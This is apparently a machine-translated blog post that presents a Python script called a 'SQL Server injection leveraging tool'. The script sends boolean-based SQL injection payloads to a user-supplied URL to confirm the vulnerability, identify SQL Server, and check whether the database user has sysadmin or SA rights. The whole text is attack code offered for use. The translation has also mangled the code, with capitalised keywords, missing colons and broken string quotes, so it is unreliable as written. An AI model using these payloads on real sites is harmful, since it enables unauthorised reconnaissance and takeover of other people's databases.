Python write database sa user detection scheme

Boring time, a small program written in Python, with a link to the injection point, to detect whether the current database user is SA, no technical content.

# Code by Zhaoxiaobu email:little.bu@hotmail.com

 
 

  
  

  
#-*-Coding:utf-8-*-
  
  

  
From sys import exit
  
  

  
From Urllib import Urlopen
  
  

  
From string import Join,strip
  
  

  
From re import search
  
  

  

  
  

  

  
  

  
Def is_sqlable ():
  
  

  
sql1= "%20and%201=2"
  
  

  
Sql2= "%20and%201=1"
  
  

  
Urlfile1=urlopen (URL+SQL1)
  
  

  
Urlfile2=urlopen (URL+SQL2)
  
  

  
Htmlcodes1=urlfile1.read ()
  
  

  
Htmlcodes2=urlfile2.read ()
  
  

  
If not search (judge,htmlcodes1) and search (Judge,htmlcodes2):
  
  

  
print "[INFO] Congratulations! This URL is a!n with an injected vulnerability."
  
  

  
print "[Information] now determines whether the database is SQL Server, please be patient ..."
  
  

  
Is_sqlserver ()
  
  

  
Else
  
  

  
Print [ERROR] Are you sure this URL will work? Try something else.!n "
  
  

  

  
  

  
Def is_sqlserver ():
  
  

  
sql = "%20and%20exists%20 (select%20*%20from%20sysobjects)"
  
  

  
Urlfile=urlopen (Url+sql)
  
  

  
Htmlcodes=urlfile.read ()
  
  

  
If not search (judge,htmlcodes):
  
  

  
print "[ERROR] database does not seem to be!n SQL Server"
  
  

  
Else
  
  

  
print "[INFO] confirms SQL Server database!n"
  
  

  
print [INFO] begins to detect current database user permissions, please be patient ... "
  
  

  
Is_sysadmin ()
  
  

  

  
  

  

  
  

  
Def is_sysadmin ():
  
  

  
sql = "%20and%201= (select%20is_srvrolemember (' sysadmin ')")
  
  

  
Urlfile = Urlopen (url+sql)
  
  

  
Htmlcodes = Urlfile.read ()
  
  

  
If not search (judge,htmlcodes):
  
  

  
print "[ERROR] The current database user does not have sysadmin permission!n"
  
  

  
Else
  
  

  
print [INFO] The current database user has sysadmin permissions!n "
  
  

  
Print [INFO] detects if the current user is an SA, please be patient ...
  
  

  
Is_sa ()
  
  

  

  
  

  
Def Is_sa ():
  
  

  
sql = "%20and%20 ' sa ' = (select%20system_user)";
  
  

  
Urlfile = Urlopen (url+sql)
  
  

  
Htmlcodes = Urlfile.read ()
  
  

  
If not search (judge,htmlcodes):
  
  

  
print "[ERROR] current database user is not Sa!n"
  
  

  
Else
  
  

  
print "[INFO] Current database user is Sa!n"
  
  

  

  
  

  

  
  

  

  
  

  

  
  

  

  
  

  
Print "n####################################################################### #n"
  
  

  
print "^o^ SQL Server injection leveraging tool ^o^"
  
  

  
Print "Email:little.bu@hotmail.comn"
  
  

  
print "========================================================================";
  
  

  
url = raw_input (' [INFO] Please enter a link that may have an injection vulnerability!nurl: ')
  
  

  
If url = = ':
  
  

  
The URL provided by print "[ERROR] must have a format such as '. asp?xxx= '
  
  

  
Exit (1)
  
  

  

  
  

  
Judge = Raw_input ([INFO] Please provide a judgment string. N judgment string: ")
  
  

  
If Judge = = ':
  
  

  
print "[ERROR] to determine the string cannot be empty!"
  
  

  
Exit (1)
  
  

  

  
  

  
Is_sqlable ()